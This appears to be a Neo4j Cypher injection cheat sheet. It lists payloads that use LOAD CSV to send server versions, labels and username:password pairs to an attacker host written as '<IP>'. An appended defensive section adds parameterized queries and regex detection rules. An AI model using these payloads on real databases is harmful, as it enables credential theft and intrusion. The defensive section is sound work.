Neo4j Injection
## ------------------| Get Server Version
' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://<IP>/?v=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //
## ------------------| List All Labels (Neo4j's Equivalent of Tables)
' RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://<IP>/?l='+label as l RETURN 0 as _0
'}) RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://<IP>/?l='+label as l RETURN 0 as _0
## ------------------| Fetch Data
' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://<IP>/?d=' + p +'='+toString(f[p]) as l RETURN 0 as _0 //
a ' match (u:user) with distinct keys(u) as k LOAD CSV FROM 'http://<IP>/?k=' + k[0] as l RETURN 0 as _0 //
' match (u:user) with distinct u.username + ":" + u.password as a LOAD CSV FROM 'http://<IP>/?' + a as l RETURN 0 as _0 //
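
Defender's view of the payloads above, as an added example that is not part of the original notes: the same input against a concatenated query and a parameterized one, plus a check for the two markers these payloads share in query text. The lookup query, function names and the benign sample are assumptions made for illustration.

```python
import re

# Hypothetical lookup an application might run (assumption, not from the page).
def build_unsafe(username):
    # Vulnerable: input is spliced into the Cypher text, so a quote ends the literal.
    return "MATCH (u:user) WHERE u.username = '" + username + "' RETURN u", {}

def build_safe(username):
    # Hardened: constant query text; the input is sent as a bound parameter.
    return "MATCH (u:user) WHERE u.username = $username RETURN u", {"username": username}

# Markers shared by the payloads listed on this page.
RULES = {
    # LOAD CSV whose http(s) URL is built by concatenation: data leaves in the URL.
    "load_csv_dynamic_url": re.compile(
        r"LOAD\s+CSV\s+(?:WITH\s+HEADERS\s+)?FROM\s+'https?://[^']*'\s*\+", re.I),
    # Server version or label introspection procedures.
    "introspection_call": re.compile(
        r"\bCALL\s+(?:dbms\.components|db\.labels)\s*\(", re.I),
}

def findings(query_text):
    """Return the sorted names of the rules that match one query text."""
    return sorted(name for name, rx in RULES.items() if rx.search(query_text))

# Constructed input: the server-version payload from this page, placeholder host kept.
PAYLOAD = ("' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition "
           "UNWIND versions as version LOAD CSV FROM 'http://<IP>/?v=' + version + "
           "'&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //")
# Constructed benign query: a static import URL, no concatenation.
BENIGN = "LOAD CSV FROM 'https://example.com/cities.csv' AS row RETURN row"

if __name__ == "__main__":
    for build in (build_unsafe, build_safe):
        text, params = build(PAYLOAD)
        # Unsafe: both rules fire on the query text. Safe: text is clean, payload is data.
        print(build.__name__, findings(text), "params:", list(params))
    print("benign", findings(BENIGN))
```

With the parameterized form the quote never terminates a string literal, so the query text the database parses stays constant and the payload is only ever compared as a username value.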